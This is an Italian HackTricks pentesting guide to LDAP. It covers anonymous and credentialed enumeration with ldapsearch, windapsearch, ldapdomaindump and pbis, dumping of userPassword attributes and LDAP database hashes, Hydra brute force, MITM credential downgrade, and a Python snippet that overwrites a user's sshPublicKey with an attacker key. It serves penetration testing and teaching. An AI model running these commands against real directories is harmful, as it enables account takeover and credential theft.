17 KiB
389, 636, 3268, 3269 - Test di penetrazione LDAP
Impara l'hacking AWS da zero a esperto con htARTE (Esperto Red Team AWS di HackTricks)!
Altri modi per supportare HackTricks:
- Se desideri vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF Controlla i PIANI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri La Famiglia PEASS, la nostra collezione di NFT esclusivi
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR a HackTricks e HackTricks Cloud repos di github.
L'uso di LDAP (Lightweight Directory Access Protocol) è principalmente per individuare varie entità come organizzazioni, individui e risorse come file e dispositivi all'interno di reti, sia pubbliche che private. Offre un approccio snello rispetto al suo predecessore, DAP, avendo un'impronta di codice più piccola.
Le directory LDAP sono strutturate per consentire la loro distribuzione su diversi server, con ciascun server che ospita una versione replicata e sincronizzata della directory, denominata Directory System Agent (DSA). La responsabilità di gestire le richieste è interamente dell'LDAP server, che può comunicare con altri DSA secondo necessità per fornire una risposta unificata al richiedente.
L'organizzazione della directory LDAP assomiglia a una gerarchia ad albero, partendo dalla directory radice in alto. Questa si ramifica in paesi, che si dividono ulteriormente in organizzazioni, e poi in unità organizzative che rappresentano varie divisioni o dipartimenti, raggiungendo infine il livello delle entità individuali, inclusi persone e risorse condivise come file e stampanti.
Porta predefinita: 389 e 636 (ldaps). Il Catalogo globale (LDAP in ActiveDirectory) è disponibile per impostazione predefinita sulle porte 3268 e 3269 per LDAPS.
PORT STATE SERVICE REASON
389/tcp open ldap syn-ack
636/tcp open tcpwrapped
Formato di interscambio dati LDAP
LDIF (LDAP Data Interchange Format) definisce il contenuto della directory come un insieme di record. Può anche rappresentare le richieste di aggiornamento (Aggiungi, Modifica, Elimina, Rinomina).
dn: dc=local
dc: local
objectClass: dcObject
dn: dc=moneycorp,dc=local
dc: moneycorp
objectClass: dcObject
objectClass: organization
dn ou=it,dc=moneycorp,dc=local
objectClass: organizationalUnit
ou: dev
dn: ou=marketing,dc=moneycorp,dc=local
objectClass: organizationalUnit
Ou: sales
dn: cn= ,ou= ,dc=moneycorp,dc=local
objectClass: personalData
cn:
sn:
gn:
uid:
ou:
mail: pepe@hacktricks.xyz
phone: 23627387495
- Le righe 1-3 definiscono il dominio di primo livello local
- Le righe 5-8 definiscono il dominio di secondo livello moneycorp (moneycorp.local)
- Le righe 10-16 definiscono 2 unità organizzative: dev e sales
- Le righe 18-26 creano un oggetto del dominio e assegnano attributi con valori
Scrivere dati
Nota che se puoi modificare i valori potresti essere in grado di eseguire azioni davvero interessanti. Ad esempio, immagina che puoi cambiare le informazioni "sshPublicKey" del tuo utente o di qualsiasi utente. È molto probabile che se questo attributo esiste, allora ssh sta leggendo le chiavi pubbliche da LDAP. Se puoi modificare la chiave pubblica di un utente, potrai accedere come tale utente anche se l'autenticazione tramite password non è abilitata in ssh.
# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
>>> import ldap3
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
>>> connection.bind()
True
>>> connection.extend.standard.who_am_i()
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
Inter cattura delle credenziali in testo normale
Se LDAP viene utilizzato senza SSL è possibile intercettare le credenziali in testo normale nella rete.
Inoltre, è possibile effettuare un attacco MITM nella rete tra il server LDAP e il client. Qui è possibile effettuare un Attacco di declassamento in modo che il client utilizzi le credenziali in testo normale per effettuare l'accesso.
Se viene utilizzato SSL è possibile provare a fare un MITM come quello menzionato in precedenza, offrendo un certificato falso, se l'utente lo accetta, è possibile declassare il metodo di autenticazione e vedere nuovamente le credenziali.
Accesso anonimo
Elusione del controllo TLS SNI
Secondo questo articolo semplicemente accedendo al server LDAP con un nome di dominio arbitrario (come company.com) è stato in grado di contattare il servizio LDAP ed estrarre informazioni come utente anonimo:
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
Bind anonimi LDAP
I bind anonimi LDAP permettono agli attaccanti non autenticati di recuperare informazioni dal dominio, come un elenco completo di utenti, gruppi, computer, attributi dell'account utente e la password di dominio. Si tratta di una configurazione legacy, e a partire da Windows Server 2003, solo gli utenti autenticati possono avviare richieste LDAP.
Tuttavia, gli amministratori potrebbero aver avuto la necessità di configurare un'applicazione particolare per consentire i bind anonimi e aver concesso più accesso del previsto, permettendo così agli utenti non autenticati di accedere a tutti gli oggetti in AD.
Credenziali valide
Se si dispongono di credenziali valide per accedere al server LDAP, è possibile estrarre tutte le informazioni sull'Amministratore di Dominio utilizzando:
pip3 install ldapdomaindump
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
Brute Force
Enumerazione
Automatico
Utilizzando questo metodo sarai in grado di visualizzare le informazioni pubbliche (come il nome di dominio):
nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
Python
Vedi l'enumerazione LDAP con python
Puoi provare a enumerare un LDAP con o senza credenziali usando python: pip3 install ldap3
Prima prova a connetterti senza credenziali:
>>> import ldap3
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
True
>>> server.info
Se la risposta è True
come nell'esempio precedente, è possibile ottenere alcuni dati interessanti del server LDAP (come il contesto di denominazione o il nome di dominio) da:
>>> server.info
DSA info (from DSE):
Supported LDAP versions: 3
Naming contexts:
dc=DOMAIN,dc=DOMAIN
Una volta ottenuto il contesto di denominazione, puoi effettuare query più interessanti. Questa semplice query dovrebbe mostrarti tutti gli oggetti nella directory:
>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
True
>> connection.entries
O scarica l'intero ldap:
>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
True
>>> connection.entries
windapsearch
Windapsearch è uno script Python utile per enumerare utenti, gruppi e computer da un dominio Windows utilizzando query LDAP.
# Get computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
# Get groups
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
# Get users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Domain Admins
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Privileged Users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users
ldapsearch
Controlla le credenziali nulle o se le tue credenziali sono valide:
ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
# CREDENTIALS NOT VALID RESPONSE
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839
Se trovi qualcosa che dice che il "bind deve essere completato" significa che le credenziali non sono corrette.
Puoi estrarre tutto da un dominio usando:
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
-H LDAP Server
-D My User
-w My password
-b Base site, all data from here will be given
Estrarre utenti:
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"
Estrai computers:
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
Estrai le mie informazioni:
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
Estrai Domain Admins:
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
Estrai Utenti di Dominio:
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
Estrai Enterprise Admins:
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
Estrarre Amministratori:
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
Estrai Gruppo Desktop Remoto:
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
Per verificare se hai accesso a una qualsiasi password, puoi utilizzare il comando grep dopo aver eseguito una delle query:
<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"
pbis
Puoi scaricare pbis da qui: https://github.com/BeyondTrust/pbis-open/ ed è di solito installato in /opt/pbis
.
Pbis ti permette di ottenere facilmente informazioni di base:
#Read keytab file
./klist -k /etc/krb5.keytab
#Get known domains info
./get-status
./lsa get-status
#Get basic metrics
./get-metrics
./lsa get-metrics
#Get users
./enum-users
./lsa enum-users
#Get groups
./enum-groups
./lsa enum-groups
#Get all kind of objects
./enum-objects
./lsa enum-objects
#Get groups of a user
./list-groups-for-user <username>
./lsa list-groups-for-user <username>
#Get groups of each user
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
#Get users of a group
./enum-members --by-name "domain admins"
./lsa enum-members --by-name "domain admins"
#Get users of each group
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
#Get description of each user
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
echo "$line";
./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
echo "======================"
done
Interfaccia Grafica
Apache Directory
Scarica Apache Directory da qui. Puoi trovare un esempio di come utilizzare questo strumento qui.
jxplorer
Puoi scaricare un'interfaccia grafica con server LDAP qui: http://www.jxplorer.org/downloads/users.html
Di default è installato in: /opt/jxplorer
Godap
Puoi accedervi su https://github.com/Macmod/godap
Autenticazione tramite kerberos
Utilizzando ldapsearch
puoi autenticarti contro kerberos invece che tramite NTLM utilizzando il parametro -Y GSSAPI
POST
Se puoi accedere ai file in cui sono contenuti i database (potrebbero trovarsi in /var/lib/ldap). Puoi estrarre gli hash utilizzando:
cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u
File di configurazione
- Generale
- containers.ldif
- ldap.cfg
- ldap.conf
- ldap.xml
- ldap-config.xml
- ldap-realm.xml
- slapd.conf
- Server IBM SecureWay V3
- V3.sas.oc
- Server Microsoft Active Directory
- msadClassesAttrs.ldif
- Server Netscape Directory 4
- nsslapd.sas_at.conf
- nsslapd.sas_oc.conf
- Server directory OpenLDAP
- slapd.sas_at.conf
- slapd.sas_oc.conf
- Server Sun ONE Directory 5.1
- 75sas.ldif
Protocol_Name: LDAP #Protocol Abbreviation if there is one.
Port_Number: 389,636 #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for LDAP
Note: |
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.
https://book.hacktricks.xyz/pentesting/pentesting-ldap
Entry_2:
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}
Entry_3:
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x
Entry_4:
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts
Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"
Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
Impara l'hacking AWS da zero a eroe con htARTE (Esperto Red Team AWS di HackTricks)!
Altri modi per supportare HackTricks:
- Se desideri vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF Controlla i PIANI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri La Famiglia PEASS, la nostra collezione di esclusive NFT
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR a HackTricks e HackTricks Cloud repos di github.